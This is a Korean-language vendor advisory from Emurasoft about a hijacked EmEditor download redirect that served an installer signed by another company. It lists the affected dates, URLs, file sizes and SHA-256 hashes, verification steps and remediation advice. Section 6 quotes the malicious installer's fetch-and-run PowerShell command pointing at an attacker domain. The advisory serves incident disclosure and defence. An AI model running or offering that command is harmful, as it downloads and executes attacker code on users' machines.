[중요] EmEditor 설치 프로그램 다운로드 링크 관련 보안 사고 안내

EmEditor를 이용해 주셔서 감사합니다.

EmEditor 공식 웹사이트의 다운로드 경로( [Download Now] 버튼)에서 제3자에 의한 무단 변경이 의심되는 사고를 확인하였습니다. 영향 기간 동안 해당 버튼을 통해 다운로드된 설치 프로그램은 당사(Emurasoft, Inc.)가 제공한 정식 파일이 아닐 가능성이 있습니다.

이로 인해 심려와 불편을 끼쳐 드린 점 진심으로 사과드립니다. 아래 내용을 확인해 주시기 바랍니다.

1. 잠재적 영향 기간

• 2025년 12월 19일 18:39 – 2025년 12월 22일 12:50 (미국 태평양 표준시)

이 기간에 EmEditor 홈페이지의 [Download Now] 버튼으로 설치 프로그램을 다운로드하셨다면, 당사의 디지털 서명이 없는 다른 파일이 다운로드되었을 가능성이 있습니다. 이는 보수적으로 산정한 기간이며, 실제 영향 범위는 더 좁고 특정 시간대에 한정되었을 수 있습니다.

2. 사고 개요(상위 수준 원인)

[Download Now] 버튼은 정상적으로 아래 URL을 가리킵니다.

• https://support.emeditor.com/en/downloads/latest/installer/64

이 URL은 리다이렉트를 사용합니다. 그러나 영향 기간 동안 리다이렉트 설정이 제3자에 의해 변경된 것으로 보이며, 그 결과 아래의 (잘못된) URL에서 다운로드가 제공되었습니다.

• https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

이 파일은 Emurasoft, Inc.에서 생성한 것이 아니며, 이미 삭제 조치되었습니다.

그 결과, 다운로드된 파일이 당사가 아닌 WALSHAM INVESTMENTS LIMITED라는 다른 조직에 의해 디지털 서명되었을 가능성을 확인했습니다.

참고: 본 문제는 영어 페이지에만 국한되지 않을 수 있으며, (일본어를 포함한) 다른 언어의 유사한 URL에도 영향을 미쳤을 가능성이 있습니다.

3. 잠재적으로 영향을 받았을 수 있는 것으로 확인된 파일

현재 관련된 것으로 확인된 파일은 다음 1개뿐입니다.

• emed64_25.4.3.msi

정상 파일(공식)

• 파일명: emed64_25.4.3.msi
• 크기: 80,376,832 bytes
• 디지털 서명: Emurasoft, Inc.
• SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

의심 파일(변조 가능)

• 파일명: emed64_25.4.3.msi
• 크기: 80,380,416 bytes
• 디지털 서명: WALSHAM INVESTMENTS LIMITED

4. 영향 없음(해당 시)

아래 항목 중 하나라도 해당하면 영향을 받지 않습니다.

• EmEditor의 업데이트 확인(Update Checker) 또는 자동 업데이트로 업데이트한 경우
• download.emeditor.info에서 직접 다운로드한 경우
  예: https://download.emeditor.info/emed64_25.4.3.msi
• emed64_25.4.3.msi 이외의 파일을 다운로드한 경우
• 포터블 버전을 사용한 경우
• 스토어 앱 버전을 사용한 경우
• winget으로 설치/업데이트한 경우
• 파일을 다운로드했지만 실행(설치)하지 않은 경우

5. 확인 방법 및 조치 안내

영향 기간에 [Download Now]를 통해 설치 프로그램을 다운로드했을 가능성이 있다면, emed64_25.4.3.msi 파일의 디지털 서명과 SHA-256 해시를 확인해 주십시오.

5-1. 디지털 서명 확인 방법(Windows)

1. 파일(emed64_25.4.3.msi)을 마우스 오른쪽 버튼으로 클릭하고 속성을 선택합니다.
2. 디지털 서명 탭을 엽니다.
3. 서명자가 Emurasoft, Inc.인지 확인합니다.

• WALSHAM INVESTMENTS LIMITED로 표시되면 악성 파일일 가능성이 있습니다.

“디지털 서명” 탭이 보이지 않는 경우, 서명이 없거나 서명이 인식되지 않는 상태일 수 있습니다. 이 경우 파일을 실행하지 말고 삭제한 뒤 아래 안내를 따라 주십시오.

5-2. SHA-256 확인 방법(Windows / PowerShell)

PowerShell을 열고 다음을 실행합니다.

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

출력된 SHA-256이 아래 값과 일치하는지 확인합니다.

• 정상 SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

서명 또는 SHA-256이 일치하지 않는 경우(권장 조치)

디지털 서명이 Emurasoft, Inc.가 아니거나(예: WALSHAM INVESTMENTS LIMITED) SHA-256이 일치하지 않으면, 변조된 파일(악성코드 포함 가능)을 받았을 수 있습니다.

• 즉시 해당 PC를 네트워크(유선/무선)에서 분리
• 시스템에 대해 전체 악성코드 검사 실행
• 상황에 따라 OS를 포함한 환경 재구축/초기화 검토
• 자격 증명 유출 가능성을 고려하여, 해당 기기에서 사용/저장한 비밀번호 변경(가능하면 MFA 활성화)

조직에서 EmEditor를 사용 중이라면, 내부 보안 담당 조직(예: CSIRT)에 연락하고 가능한 범위에서 관련 로그를 보존할 것도 권장합니다.

6. 확인된 동작(현재까지 확인된 내용)

의심 설치 프로그램은 실행 시 아래 명령을 시도할 수 있습니다. 어떠한 경우에도 이 명령을 실행하지 마십시오.

• powershell.exe "irm emeditorjp.com | iex"

이 명령은 emeditorjp.com에서 콘텐츠를 다운로드하여 실행합니다.
emeditorjp.com은 Emurasoft, Inc.가 관리하는 도메인이 아닙니다.

또한 해당 설치 프로그램이 정상적으로 EmEditor 설치를 계속 진행하고, 정식 EmEditor 프로그램 파일을 설치할 수도 있어 문제를 알아차리기 어려울 수 있습니다.

7. 현재 상태 및 향후 업데이트

현재 사실 관계를 계속 조사 중이며, 영향 범위 전체를 파악하고 있습니다. 추가 정보가 확인되는 대로 본 페이지 및/또는 공식 채널을 통해 신속히 안내드리겠습니다.
당사는 본 사고를 매우 엄중하게 받아들이고 있으며, 원인 규명과 재발 방지를 위해 필요한 조치를 시행하겠습니다.

다시 한 번 심려와 불편을 끼쳐 드린 점 진심으로 사과드리며, 양해와 EmEditor에 대한 지속적인 성원에 감사드립니다.